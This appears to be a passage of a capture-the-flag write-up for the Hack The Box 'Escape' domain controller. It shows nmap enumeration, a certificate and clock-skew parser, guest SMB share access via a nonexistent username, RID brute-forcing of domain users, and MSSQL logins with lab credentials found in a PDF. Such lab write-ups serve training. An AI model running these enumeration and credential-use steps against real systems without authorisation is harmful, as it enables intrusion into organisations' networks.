Nmap Enumeration
Nmap scan report for 10.10.11.202
Host is up, received echo-reply ttl 127 (0.087s latency).
Scanned at 2025-06-09 07:56:39 CDT for 112s
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-06-09 12:35:38Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-09T12:37:08+00:00; -21m21s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:05:34
| Not valid after: 2023-11-18T21:05:34
| MD5: 96b3:fe55:906c:1d2c:97a1:f4f0:26b1:10b6
| SHA-1: b395:4d2d:39dc:ef1a:673d:6aeb:9de9:1168:91ce:57b2
| -----BEGIN CERTIFICATE-----
| MIIFjzCCBHegAwIBAgITHgAAAAOxjNe2IgNQeAAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
| MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjIxMTE4MjEwNTM0WhcNMjMxMTE4
| MjEwNTM0WjAAMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr31Axr2W
| 3+qC7+uxVxKHqovlVAzMBXAlhjqcAJRLzAkYTGtiasep1Upfu1EVNKxeN3OfAJAB
| W8F/ROQeDHuGQ5KpB1eZwQZBxD3Qz+GZWLIwJla8+2xwM6d3KA4BfVCr/UuI/IPT
| /DD2jncU0UencJIVVnSA7yHr43oO6Fk2sBuzBRF+G+wRMC/7jUWGbchR635szwS+
| TKL6wW2c1OAJ4IJ76XoizXXpyvV3KdiCA6/AO4e7hbkPt6Qm1y/RJf7xIM8QI67F
| IX9nup8TQFqzWUhVyx0RLfbhZIU1lNumaGuu+VY6tFzcuyfq1wGYlOat3g+Cqv0o
| jfmQwMFidtlxiQIDAQABo4ICvDCCArgwOAYJKwYBBAGCNxUHBCswKQYhKwYBBAGC
| NxUIh6vzdoXcplaH/ZU1g7/DWYOJyjWBdwEhAgFuAgEAMDIGA1UdJQQrMCkGCCsG
| AQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8BAf8E
| BAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcDATAM
| BgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFAlW4GaeJTphsLNc+2z9
| yJ304h4jMB8GA1UdIwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8E
| gbwwgbkwgbaggbOggbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxD
| Tj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049
| Q29uZmlndXJhdGlvbixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2Nh
| dGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCB
| vQYIKwYBBQUHAQEEgbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1
| ZWwtREMtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
| cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRp
| ZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTAv
| BgNVHREBAf8EJTAjgg1kYy5zZXF1ZWwuaHRiggpzZXF1ZWwuaHRiggZzZXF1ZWww
| DQYJKoZIhvcNAQELBQADggEBACcxCUjb75dE5ZRgOixbU2IwZdlXfbT9Ua5yTqTv
| NV/btl0SuC/hEhpUwRIitlSH7/DlahtefpK70aYgQLiYU3S/B/TPaGbPSviKJSFQ
| VtD+siKNSCa11DqvZKre89DGNHL8FQ7TgNeCkARo7+m3HJwwjtGNzZGin4hIr4Te
| bqSitRCdD8Aspe14/2qyH4mm3g0ffo4YIzsQlhqhN2A4OzqcL0LVJvEyIcZ2CPIW
| 1qocviqXtrlObCL+r7hTQIqhcuVt6/vOZ4LrbdDHayo80JbGpydCeUZ0KdwJuIdc
| IlLNZVlA1Dr8c7wAsbwaBZhYMDE1DOmC2aCmY5tnfkr2w1Y=
|_-----END CERTIFICATE-----
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-09T12:37:07+00:00; -21m22s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:05:34
| Not valid after: 2023-11-18T21:05:34
| MD5: 96b3:fe55:906c:1d2c:97a1:f4f0:26b1:10b6
| SHA-1: b395:4d2d:39dc:ef1a:673d:6aeb:9de9:1168:91ce:57b2
| -----BEGIN CERTIFICATE-----
| MIIFjzCCBHegAwIBAgITHgAAAAOxjNe2IgNQeAAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
| MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjIxMTE4MjEwNTM0WhcNMjMxMTE4
| MjEwNTM0WjAAMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr31Axr2W
| 3+qC7+uxVxKHqovlVAzMBXAlhjqcAJRLzAkYTGtiasep1Upfu1EVNKxeN3OfAJAB
| W8F/ROQeDHuGQ5KpB1eZwQZBxD3Qz+GZWLIwJla8+2xwM6d3KA4BfVCr/UuI/IPT
| /DD2jncU0UencJIVVnSA7yHr43oO6Fk2sBuzBRF+G+wRMC/7jUWGbchR635szwS+
| TKL6wW2c1OAJ4IJ76XoizXXpyvV3KdiCA6/AO4e7hbkPt6Qm1y/RJf7xIM8QI67F
| IX9nup8TQFqzWUhVyx0RLfbhZIU1lNumaGuu+VY6tFzcuyfq1wGYlOat3g+Cqv0o
| jfmQwMFidtlxiQIDAQABo4ICvDCCArgwOAYJKwYBBAGCNxUHBCswKQYhKwYBBAGC
| NxUIh6vzdoXcplaH/ZU1g7/DWYOJyjWBdwEhAgFuAgEAMDIGA1UdJQQrMCkGCCsG
| AQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8BAf8E
| BAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcDATAM
| BgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFAlW4GaeJTphsLNc+2z9
| yJ304h4jMB8GA1UdIwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8E
| gbwwgbkwgbaggbOggbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxD
| Tj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049
| Q29uZmlndXJhdGlvbixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2Nh
| dGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCB
| vQYIKwYBBQUHAQEEgbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1
| ZWwtREMtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
| cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRp
| ZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTA7
| BgNVHREBAf8EJTAjgg1kYy5zZXF1ZWwuaHRiggpzZXF1ZWwuaHRiggZzZXF1ZWww
| DQYJKoZIhvcNAQELBQADggEBACcxCUjb75dE5ZRgOixbU2IwZdlXfbT9Ua5yTqTv
| NV/btl0SuC/hEhpUwRIitlSH7/DlahtefpK70aYgQLiYU3S/B/TPaGbPSviKJSFQ
| VtD+siKNSCa11DqvZKre89DGNHL8FQ7TgNeCkARo7+m3HJwwjtGNzZGin4hIr4Te
| bqSitRCdD8Aspe14/2qyH4mm3g0ffo4YIzsQlhqhN2A4OzqcL0LVJvEyIcZ2CPIW
| 1qocviqXtrlObCL+r7hTQIqhcuVt6/vOZ4LrbdDHayo80JbGpydCeUZ0KdwJuIdc
| IlLNZVlA1Dr8c7wAsbwaBZhYMDE1DOmC2aCmY5tnfkr2w1Y=
|_-----END CERTIFICATE-----
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.10.11.202:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-09T12:34:38
| Not valid after: 2055-06-09T12:34:38
| MD5: 671f:5a47:d9ec:ad69:13bf:474f:9bd4:9730
| SHA-1: 85c3:1a8d:4520:1702:89af:738d:69ad:a1a4:88d8:da6c
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQRLlXC2E6CaVE2s/thpjvyzANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjUwNjA5MTIzNDM4WhgPMjA1NTA2MDkxMjM0MzhaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALnWntNq
| HY/AGNeDe62Dx9c4ufle1sjOdkoaUJghyVrxcjLMa18wHXS0SbMpxXG7IVTtqgUL
| xgvtgqjxA4li9e9j/RRULQ9fvrlfJefGxVanot2lrrYb1ytS5dG00oNLJ1D7tfbh
| vE6VbW3SE4XU1q8OWvgFRRo9+dzBagHKM7UPBdiRsiLXIUSCo+MbVgw2EXcqJGs3
| GD9uW9uuG9pWhBBDJQcuztrERRYd0xnheR+CG27DOy67harLjUkz1q3fOve2x9k/
| HRrkZHg+cswRsOcczZTMQpwtK5Fj+P2s6DZtCtTFXZtFfxuEslEBxOyKx5xWeZ5D
| RcZooTrWx1Cj4ZUCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAhv9l7MCUw0qBZ0Vh
| JUwld6PvWrYwAB6Ikpilo2J9+LRDTAXo0HUzFHkSagY72cCTI24jTIvMwsWZARGN
| 8A5aWYO2e5QoPkUeE3BHFSrEnMJ9cQj8amwkwQVJTkSxCsHO+SDS2jimngqPYeNj
| BVQfzUa2iqRirpxrJ92QnW9w+yCcM1ZugWTPFGpzmQDZtn57xqKPB7M8gL74Exle
| AabW9gYyJkigulGL7VLneT234XgYGv62enhC/OfB+20AIdXJZMYXc5NENPmr/bTN
| EKDML6PTJkPLlFRo/+22jV/qTRTOaUURDjuAw7O3GuLJv25FQHNJoRrK27oylwep
| 4V9BlQ==
|_-----END CERTIFICATE-----
|_ssl-date: 2025-06-09T12:37:08+00:00; -21m21s from scanner time.
| ms-sql-ntlm-info:
| 10.10.11.202:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:05:34
| Not valid after: 2023-11-18T21:05:34
| MD5: 96b3:fe55:906c:1d2c:97a1:f4f0:26b1:10b6
| SHA-1: b395:4d2d:39dc:ef1a:673d:6aeb:9de9:1168:91ce:57b2
| -----BEGIN CERTIFICATE-----
| MIIFjzCCBHegAwIBAgITHgAAAAOxjNe2IgNQeAAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
| MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjIxMTE4MjEwNTM0WhcNMjMxMTE4
| MjEwNTM0WjAAMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr31Axr2W
| 3+qC7+uxVxKHqovlVAzMBXAlhjqcAJRLzAkYTGtiasep1Upfu1EVNKxeN3OfAJAB
| W8F/ROQeDHuGQ5KpB1eZwQZBxD3Qz+GZWLIwJla8+2xwM6d3KA4BfVCr/UuI/IPT
| /DD2jncU0UencJIVVnSA7yHr43oO6Fk2sBuzBRF+G+wRMC/7jUWGbchR635szwS+
| TKL6wW2c1OAJ4IJ76XoizXXpyvV3KdiCA6/AO4e7hbkPt6Qm1y/RJf7xIM8QI67F
| IX9nup8TQFqzWUhVyx0RLfbhZIU1lNumaGuu+VY6tFzcuyfq1wGYlOat3g+Cqv0o
| jfmQwMFidtlxiQIDAQABo4ICvDCCArgwOAYJKwYBBAGCNxUHBCswKQYhKwYBBAGC
| NxUIh6vzdoXcplaH/ZU1g7/DWYOJyjWBdwEhAgFuAgEAMDIGA1UdJQQrMCkGCCsG
| AQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8BAf8E
| BAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcDATAM
| BgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFAlW4GaeJTphsLNc+2z9
| yJ304h4jMB8GA1UdIwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8E
| gbwwgbkwgbaggbOggbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxD
| Tj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049
| Q29uZmlndXJhdGlvbixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2Nh
| dGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCB
| vQYIKwYBBQUHAQEEgbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1
| ZWwtREMtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
| cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRp
| ZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTAv
| BgNVHREBAf8EJTAjgg1kYy5zZXF1ZWwuaHRiggpzZXF1ZWwuaHRiggZzZXF1ZWww
| DQYJKoZIhvcNAQELBQADggEBACcxCUjb75dE5ZRgOixbU2IwZdlXfbT9Ua5yTqTv
| NV/btl0SuC/hEhpUwRIitlSH7/DlahtefpK70aYgQLiYU3S/B/TPaGbPSviKJSFQ
| VtD+siKNSCa11DqvZKre89DGNHL8FQ7TgNeCkARo7+m3HJwwjtGNzZGin4hIr4Te
| bqSitRCdD8Aspe14/2qyH4mm3g0ffo4YIzsQlhqhN2A4OzqcL0LVJvEyIcZ2CPIW
| 1qocviqXtrlObCL+r7hTQIqhcuVt6/vOZ4LrbdDHayo80JbGpydCeUZ0KdwJuIdc
| IlLNZVlA1Dr8c7wAsbwaBZhYMDE1DOmC2aCmY5tnfkr2w1Y=
|_-----END CERTIFICATE-----
|
| Checking for Conficker.C or higher...
| Check 1 (port 63970/tcp): CLEAN (Timeout)
| Check 2 (port 35661/tcp): CLEAN (Timeout)
| Check 3 (port 50586/udp): CLEAN (Timeout)
| Check 4 (port 52925/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-06-09T12:36:24
|_ start_date: N/A
|_clock-skew: mean: -21m22s, deviation: 2s, median: -21m22s
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 9 07:58:31 2025 -- 1 IP address (1 host up) scanned in 112.59 seconds
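Two details in this scan matter later and are easy to lose in the certificate dumps: every certificate the DC presents on 389, 636 and 3268 was issued by sequel-DC-CA (so AD CS is present, and that is the CA name used with certipy further down) and expired on 2023-11-18, long before the scan date; and the host clock is about 21 minutes behind the scanner, far outside the 5-minute default Kerberos tolerance. The script below is an added example, not part of the original writeup: it pulls both findings out of nmap's normal output. Its input is a constructed, trimmed copy of the scan above containing only the lines the parser reads.

```python
import re
from datetime import datetime

# Constructed input: a trimmed copy of the nmap output above (only the lines the parser reads).
NMAP_EXCERPT = """\
Scanned at 2025-06-09 07:56:39 CDT for 112s
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-09T12:37:08+00:00; -21m21s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Not valid before: 2022-11-18T21:05:34
| Not valid after: 2023-11-18T21:05:34
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-09T12:37:07+00:00; -21m22s from scanner time.
| ssl-cert: Subject:
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Not valid after: 2023-11-18T21:05:34
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Not valid after: 2055-06-09T12:34:38
|_ssl-date: 2025-06-09T12:37:08+00:00; -21m21s from scanner time.
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Not valid after: 2023-11-18T21:05:34
"""

KERBEROS_MAX_SKEW = 300  # seconds; the default Kerberos clock-skew tolerance

PORT_RE = re.compile(r"^(\d+)/tcp\s+open")
SSL_DATE_RE = re.compile(r"\|_ssl-date:\s*(\S+);\s*(\S+) from scanner time")
ISSUER_RE = re.compile(r"^\| Issuer:.*?commonName=([^/]+)")


def parse_skew(text: str) -> int:
    """'-21m21s' -> -1281 seconds (nmap's h/m/s skew notation)."""
    sign = -1 if text.startswith("-") else 1
    unit_secs = {"h": 3600, "m": 60, "s": 1}
    return sign * sum(int(n) * unit_secs[u] for n, u in re.findall(r"(\d+)([hms])", text))


def parse_nmap(text: str):
    """Walk nmap normal output and collect, per open TCP port, the ssl-cert issuer CN,
    the certificate's not-after date (UTC, naive) and the ssl-date clock skew.
    Also returns the server's own clock, taken from the first ssl-date line."""
    certs, server_time, port = {}, None, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port = int(m.group(1))
            certs.setdefault(port, {})
            continue
        if port is None:
            continue
        m = SSL_DATE_RE.search(line)
        if m:
            server_time = server_time or datetime.fromisoformat(m.group(1)[:19])
            certs[port]["skew"] = parse_skew(m.group(2))
            continue
        m = ISSUER_RE.match(line)
        if m:
            certs[port]["issuer"] = m.group(1).strip()
        elif line.startswith("| Not valid after:"):
            certs[port]["not_after"] = datetime.fromisoformat(line.split(":", 1)[1].strip())
    return server_time, certs


def findings(text: str) -> dict:
    """Flag certificates already expired by the server's own clock and ports whose
    skew exceeds what Kerberos tolerates; list the issuer CNs seen (an enterprise
    CA name showing up here is the first hint that AD CS is in play)."""
    server_time, certs = parse_nmap(text)
    expired = sorted(p for p, c in certs.items()
                     if "not_after" in c and server_time and c["not_after"] < server_time)
    skewed = sorted(p for p, c in certs.items() if abs(c.get("skew", 0)) > KERBEROS_MAX_SKEW)
    issuers = sorted({c["issuer"] for c in certs.values() if "issuer" in c})
    return {"server_time": server_time, "expired": expired, "skewed": skewed, "issuers": issuers}


if __name__ == "__main__":
    for key, value in findings(NMAP_EXCERPT).items():
        print(f"{key}: {value}")
```

Feed it a saved `-oN` file instead of the excerpt. If the skew check fires, sync your clock against the DC before any Kerberos-based tooling; the expired DC certificate is the most likely reason the PKINIT step at the end of this writeup fails.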
SMB Enumeration
Null User Login
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec smb 10.10.11.202 -u '' -p '' --shares
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\:
SMB 10.10.11.202 445 DC [-] Error enumerating shares: STATUS_ACCESS_DENIED
Does Not Exist User Login
The null session is accepted but cannot list shares. A username that does not exist, with an empty password, is also accepted (the DC maps it to the Guest account) and can list shares, with READ access to IPC$ and Public:
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec smb 10.10.11.202 -u 'DoesNotExist' -p '' --shares
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\DoesNotExist:
SMB 10.10.11.202 445 DC [+] Enumerated shares
SMB 10.10.11.202 445 DC Share Permissions Remark
SMB 10.10.11.202 445 DC ----- ----------- ------
SMB 10.10.11.202 445 DC ADMIN$ Remote Admin
SMB 10.10.11.202 445 DC C$ Default share
SMB 10.10.11.202 445 DC IPC$ READ Remote IPC
SMB 10.10.11.202 445 DC NETLOGON Logon server share
SMB 10.10.11.202 445 DC Public READ
SMB 10.10.11.202 445 DC SYSVOL Logon server share
Public Shares Enumeration
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ smbclient "//10.10.11.202/Public" -U 'sequel.htb\DoesNotExist'
Password for [SEQUEL.HTB\DoesNotExist]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 05:51:25 2022
.. D 0 Sat Nov 19 05:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 07:39:43 2022
5184255 blocks of size 4096. 1455544 blocks available
smb: \> prompt off
smb: \> mget *
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (110.7 KiloBytes/sec) (average 110.7 KiloBytes/sec)
smb: \> exit
PDF Enumeration
We found several usernames in the PDF, along with credentials for the Microsoft SQL Server instance on 1433/tcp: PublicUser / GuestUserCantWrite1.
RID Enumeration
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec smb 10.10.11.202 -u 'DoesNotExist' -p '' --rid-brute
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\DoesNotExist:
SMB 10.10.11.202 445 DC [+] Brute forcing RIDs
SMB 10.10.11.202 445 DC 498: sequel\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.202 445 DC 500: sequel\Administrator (SidTypeUser)
SMB 10.10.11.202 445 DC 501: sequel\Guest (SidTypeUser)
SMB 10.10.11.202 445 DC 502: sequel\krbtgt (SidTypeUser)
SMB 10.10.11.202 445 DC 512: sequel\Domain Admins (SidTypeGroup)
SMB 10.10.11.202 445 DC 513: sequel\Domain Users (SidTypeGroup)
SMB 10.10.11.202 445 DC 514: sequel\Domain Guests (SidTypeGroup)
SMB 10.10.11.202 445 DC 515: sequel\Domain Computers (SidTypeGroup)
SMB 10.10.11.202 445 DC 516: sequel\Domain Controllers (SidTypeGroup)
SMB 10.10.11.202 445 DC 517: sequel\Cert Publishers (SidTypeAlias)
SMB 10.10.11.202 445 DC 518: sequel\Schema Admins (SidTypeGroup)
SMB 10.10.11.202 445 DC 519: sequel\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.202 445 DC 520: sequel\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.202 445 DC 521: sequel\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.202 445 DC 522: sequel\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.202 445 DC 525: sequel\Protected Users (SidTypeGroup)
SMB 10.10.11.202 445 DC 526: sequel\Key Admins (SidTypeGroup)
SMB 10.10.11.202 445 DC 527: sequel\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.202 445 DC 553: sequel\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.202 445 DC 571: sequel\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.202 445 DC 572: sequel\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.202 445 DC 1000: sequel\DC$ (SidTypeUser)
SMB 10.10.11.202 445 DC 1101: sequel\DnsAdmins (SidTypeAlias)
SMB 10.10.11.202 445 DC 1102: sequel\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.202 445 DC 1103: sequel\Tom.Henn (SidTypeUser)
SMB 10.10.11.202 445 DC 1104: sequel\Brandon.Brown (SidTypeUser)
SMB 10.10.11.202 445 DC 1105: sequel\Ryan.Cooper (SidTypeUser)
SMB 10.10.11.202 445 DC 1106: sequel\sql_svc (SidTypeUser)
SMB 10.10.11.202 445 DC 1107: sequel\James.Roberts (SidTypeUser)
SMB 10.10.11.202 445 DC 1108: sequel\Nicole.Thompson (SidTypeUser)
SMB 10.10.11.202 445 DC 1109: sequel\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
MSSQL Enumeration
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec mssql 10.10.11.202 -u 'PublicUser' -p 'GuestUserCantWrite1' --local-auth
MSSQL 10.10.11.202 1433 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:DC)
MSSQL 10.10.11.202 1433 DC [+] PublicUser:GuestUserCantWrite1
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ impacket-mssqlclient 'PublicUser:GuestUserCantWrite1@10.10.11.202'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (PublicUser guest@master)>
WINRM Enumeration
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec winrm 10.10.11.202 -u 'PublicUser' -p 'GuestUserCantWrite1'
SMB 10.10.11.202 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
HTTP 10.10.11.202 5985 DC [*] http://10.10.11.202:5985/wsman
WINRM 10.10.11.202 5985 DC [-] sequel.htb\PublicUser:GuestUserCantWrite1
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec winrm 10.10.11.202 -u 'PublicUser' -p 'GuestUserCantWrite1' --local-auth
SMB 10.10.11.202 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:DC)
HTTP 10.10.11.202 5985 DC [*] http://10.10.11.202:5985/wsman
WINRM 10.10.11.202 5985 DC [-] DC\PublicUser:GuestUserCantWrite1
